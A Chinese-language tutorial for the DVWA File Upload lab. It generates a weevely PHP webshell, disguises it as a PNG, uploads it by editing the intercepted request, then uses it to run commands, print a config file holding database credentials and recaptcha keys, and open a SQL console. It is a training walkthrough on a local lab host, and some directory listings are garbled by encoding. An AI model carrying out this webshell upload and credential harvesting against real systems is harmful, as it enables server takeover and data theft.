新手指南:DVWA-1.9全级别教程之File Upload ,亲测PHP7下,中国菜刀无果。所以,这里介绍weevely。
直接上命令,生成webshell:
➜ ~ weevely generate weevely hello.php
➜ ~ cd /usr/share/weevely
➜ ~ mv hello.php hello.png
拦截请求
修改文件名后上传
and 继续weevely
? weevely weevely http://192.168.56.101/DVWA/hackable/uploads/hello.php weevely
[+] weevely 3.7.0
[+] Target: 192.168.56.101
[+] Session: /root/.weevely/sessions/192.168.56.101/hello_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> dir
???? D ?????±???
??????C022-AA4B
D:\xampp\htdocs\DVWA\hackable\uploads ????
2019-04-22 20:50 <DIR> .
2019-04-22 20:50 <DIR> ..
2019-04-22 18:03 32 1.php
2019-04-22 16:14 31 1.php%00.png
2019-02-06 16:11 667 dvwa_email.png
2019-04-22 20:46 17,919 hack.png
2019-04-22 20:50 698 hello.php
2019-04-22 20:21 17,220 ?±¨.png
6 ???? 36,567 ??
2 ???? 145,805,955,072 ????
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ whoami
cn\majx2
到这,已经拿到webshell啦~ 继续~
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ cd ../../config
majx2704:D:\xampp\htdocs\DVWA\config $ dir
Ƚ¶¯Ƿ D אµľԐ±뇩¡£
¾�ѲºƊŠC022-AA4B
D:\xampp\htdocs\DVWA\config µń¿¼
2019-04-15 15:11 <DIR> .
2019-04-15 15:11 <DIR> ..
2019-04-22 10:00 1,930 config.inc.php
2019-04-16 21:49 1,924 config.inc.php.bak
2019-02-06 16:11 1,857 config.inc.php.dist
3 ¸þ 5,711 ؖ½
2 ¸¼ 145,788,071,936 ¿ʓėֽ
majx2704:D:\xampp\htdocs\DVWA\config $ type config.inc.php
<?php
# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
# Thanks to @digininja for the fix.
# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled
# Database variables
# WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
# Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.
# See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456';
# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '3306';
# ReCAPTCHA settings
# Used for the 'Insecure CAPTCHA' module
# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
# Default security level
# Default value for the secuirty level with each session.
# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'.
$_DVWA[ 'default_security_level' ] = 'high';
# Default PHPIDS status
# PHPIDS status with each session.
# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';
# Verbose PHPIDS messages
# Enabling this will show why the WAF blocked the request on the blocked request.
# The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';
?>
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ :sql_console -host 127.0.0.1 -user root -passwd 123456
root@localhost SQL> select user()
+----------------+
| root@localhost |
+----------------+
还有很多功能,主要针对linux平台的。可以通过--help进行查看。
The End !
网友评论